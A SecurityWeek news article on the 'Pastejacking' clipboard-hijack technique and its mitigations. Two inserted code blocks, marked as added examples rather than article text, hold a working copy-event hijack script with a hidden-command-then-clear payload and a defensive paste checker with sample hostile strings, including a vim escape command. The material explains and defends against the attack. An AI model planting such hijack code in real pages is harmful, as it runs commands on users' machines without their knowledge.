SecurityWeek

Application Security
Pastejacking Attack Allows Hackers to Execute Malicious Code

The fact that web browsers allow developers to manipulate the content of the clipboard can be exploited by attackers to trick unsuspecting users into executing potentially malicious code on their systems.

Researchers demonstrated several years ago that HTML/CSS tricks could be used to place arbitrary content on the clipboard without the user's knowledge. The method detailed by developer and security expert Dylan Ayrey, dubbed "Pastejacking," instead relies on JavaScript, which gives the attacker control over when the clipboard is overwritten.

“What’s different about this is the text can be copied after an event, it can be copied on a short timer following an event, and it’s easier to copy in hex characters into the clipboard, which can be used to exploit VIM,” Ayrey explained.

A proof-of-concept (PoC) developed by Ayrey shows the threat posed by a Pastejacking attack when the user pastes commands copied from a web page into a terminal. In the example, the user believes they are copying echo "not evil", when the string actually placed on the clipboard is echo "evil" followed by a newline (\n).

The \n (newline) character ensures that the command is executed as soon as it is pasted into a terminal that passes pasted text straight to the shell, without the user having to press Enter. The victim therefore never gets to see what they are pasting before it runs.

It's worth noting that Ayrey's PoC only works if the text is copied using a keyboard shortcut. On the other hand, the malicious content is placed on the clipboard regardless of which piece of text the user selects on the PoC page.

Malicious actors can use more sophisticated payloads in which a sequence of commands is executed. For instance, Ayrey demonstrated a payload that creates a file in the home directory, clears the terminal, and then prints the command the user intended to copy, so that the screen looks as if only the harmless command was pasted. Payloads can also target the vim text editor rather than the shell, since control characters pasted into vim are interpreted as editor commands.
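The following is an added example of the mechanism described above; it is not Ayrey's PoC or any code from the article. It hooks the browser's copy event (a variant of the keyboard-shortcut approach the PoC uses) and swaps the user's selection for a payload built in the style of the "create file, clear, print the expected command" sequence. The function names, the ~/.pastejacked file name, and the fake document/event objects used to run it outside a browser are this example's own assumptions.

```javascript
// Added example (not from the article or from Ayrey's PoC): a clipboard
// hijack in the style of Pastejacking. It listens for the browser's `copy`
// event and replaces whatever the user selected with an attacker-chosen
// payload. buildHijackPayload/installHijack and ~/.pastejacked are names
// chosen for this example.

// Build a payload that (1) runs a hidden command, (2) clears the terminal,
// (3) prints the command the victim meant to copy, so the screen looks as
// if only the harmless command was pasted. The trailing newline makes a
// terminal without paste protection execute the whole line immediately.
function buildHijackPayload(coverCommand, hiddenCommand) {
  // Single-quote the cover text so the shell prints it verbatim.
  const quoted = "'" + coverCommand.replace(/'/g, `'\\''`) + "'";
  return `${hiddenCommand}; clear; echo ${quoted}\n`;
}

// Register a copy handler on a document-like object. `doc` is injected so
// the logic can be exercised outside a browser; in a page, pass `document`.
function installHijack(doc, payload) {
  doc.addEventListener('copy', function (e) {
    // Overwrite the clipboard no matter what text the user selected.
    e.clipboardData.setData('text/plain', payload);
    // Without this the browser would write the real selection afterwards.
    e.preventDefault();
  });
}

// Minimal stand-ins for the browser objects (constructed for this example)
// so the substitution can be demonstrated from Node. Returns the text that
// would end up on the clipboard.
function simulateCopy(payload, selectedText) {
  let handler = null;
  const fakeDoc = {
    addEventListener: (type, fn) => { if (type === 'copy') handler = fn; },
  };
  installHijack(fakeDoc, payload);

  const clipboard = {};
  let defaultPrevented = false;
  const fakeEvent = {
    clipboardData: { setData: (mime, text) => { clipboard[mime] = text; } },
    preventDefault: () => { defaultPrevented = true; },
  };
  handler(fakeEvent);
  // If the handler had not cancelled the default action, the browser would
  // have placed the user's own selection on the clipboard instead.
  return defaultPrevented ? clipboard['text/plain'] : selectedText;
}

const COVER = 'echo "not evil"';           // what the victim sees and selects
const HIDDEN = 'touch ~/.pastejacked';     // what actually runs first

if (typeof document !== 'undefined') {
  // In a real page: every copy from now on yields the payload.
  installHijack(document, buildHijackPayload(COVER, HIDDEN));
} else {
  // In Node: show the selected text versus the clipboard contents.
  console.log('selected :', JSON.stringify(COVER));
  console.log('clipboard:', JSON.stringify(simulateCopy(buildHijackPayload(COVER, HIDDEN), COVER)));
}
```

Because the handler fires on the copy event itself, the substitution does not depend on which text the user highlighted; everything about the selection is discarded and only the payload reaches the clipboard.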

“This method can be combined with a phishing attack to entice users into running seemingly innocent commands. The malicious code will override the innocent code, and the attacker can gain remote code execution on the user’s host if the user pastes the contents into the terminal,” Ayrey said.

The attack method does not work against Apple's Safari browser, and some applications, such as the OS X terminal replacement iTerm and the Windows console emulator Cmder, warn the user before pasting text that contains a newline character.

While many believe they would never fall for such a trick, others pointed out that copying and pasting commands from websites such as StackOverflow directly into a terminal is common practice.

Pastejacking attacks can be mitigated by disabling JavaScript or by changing settings in the affected applications. Shells that support bracketed paste mode (readline's enable-bracketed-paste, on by default since bash 5.1) also reduce the risk, because pasted newlines are inserted literally rather than executed, giving the user a chance to inspect the text. However, the easiest way to avoid falling victim to such attacks is to be cautious when pasting content from questionable sources, for example by pasting into a text editor first.
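As an added example, covering both the terminal warnings mentioned above and the mitigation advice, here is the kind of pre-paste check a terminal or clipboard helper can apply. It is not code from iTerm, Cmder or the article; the inspectPaste/revealPaste names and the sample clipboard strings are this example's own constructions. It reports anything in the clipboard text that would either execute on paste or change what the user sees.

```javascript
// Added example (not from the article, iTerm or Cmder): inspect clipboard
// text before it reaches a shell and report why it is unsafe to paste.
// Function names and sample inputs are this example's own.

function inspectPaste(text) {
  const reasons = [];
  // LF or CR: the line is submitted without the user pressing Enter
  // (CR is translated to NL by the tty, so it triggers execution too).
  if (/[\r\n]/.test(text)) {
    reasons.push('line terminator: the pasted command would run without Enter');
  }
  // ESC: start of terminal control sequences (clear screen, move cursor)
  // or, in vim, a switch to normal mode where ":!cmd" runs a shell command.
  if (/\x1b/.test(text)) {
    reasons.push('escape character: can rewrite the terminal or drive vim');
  }
  // Other C0 controls (except TAB, LF, CR, ESC, which are handled above)
  // and DEL have no place in a typed command.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1a\x1c-\x1f\x7f]/.test(text)) {
    reasons.push('control character');
  }
  // Zero-width characters make the pasted text look like the expected one.
  if (/[\u200b\u200c\u200d\u2060\ufeff]/.test(text)) {
    reasons.push('zero-width character');
  }
  return { safe: reasons.length === 0, reasons };
}

// Render the text so a warning dialog can show exactly what would be
// pasted, with control characters made visible.
function revealPaste(text) {
  return JSON.stringify(text);
}

// Constructed inputs: what the victim saw on the page versus what a
// hijacked clipboard might actually hold.
const SEEN = 'echo "not evil"';
const HIJACKED = 'touch ~/.pastejacked; clear; echo \'echo "not evil"\'\n';
const VIM_STYLE = '\x1b:!id\n';

for (const sample of [SEEN, HIJACKED, VIM_STYLE]) {
  const verdict = inspectPaste(sample);
  console.log(revealPaste(sample), '->', verdict.safe ? 'ok' : verdict.reasons.join('; '));
}
```

A terminal with this check would prompt before pasting HIJACKED or VIM_STYLE but let SEEN through; the same logic applies to a shell's bracketed paste mode, which achieves the first protection (no execution on newline) without needing to inspect the text at all.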

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
